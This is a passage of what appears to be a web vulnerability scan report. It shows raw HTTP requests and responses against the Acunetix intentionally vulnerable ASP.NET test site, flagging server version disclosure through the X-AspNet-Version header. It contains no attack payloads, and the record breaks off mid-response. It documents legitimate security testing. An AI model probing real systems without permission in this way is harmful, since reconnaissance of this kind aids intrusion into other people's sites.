Response Body - size: 14,397 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ+TqRo3QvanE8jv9G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 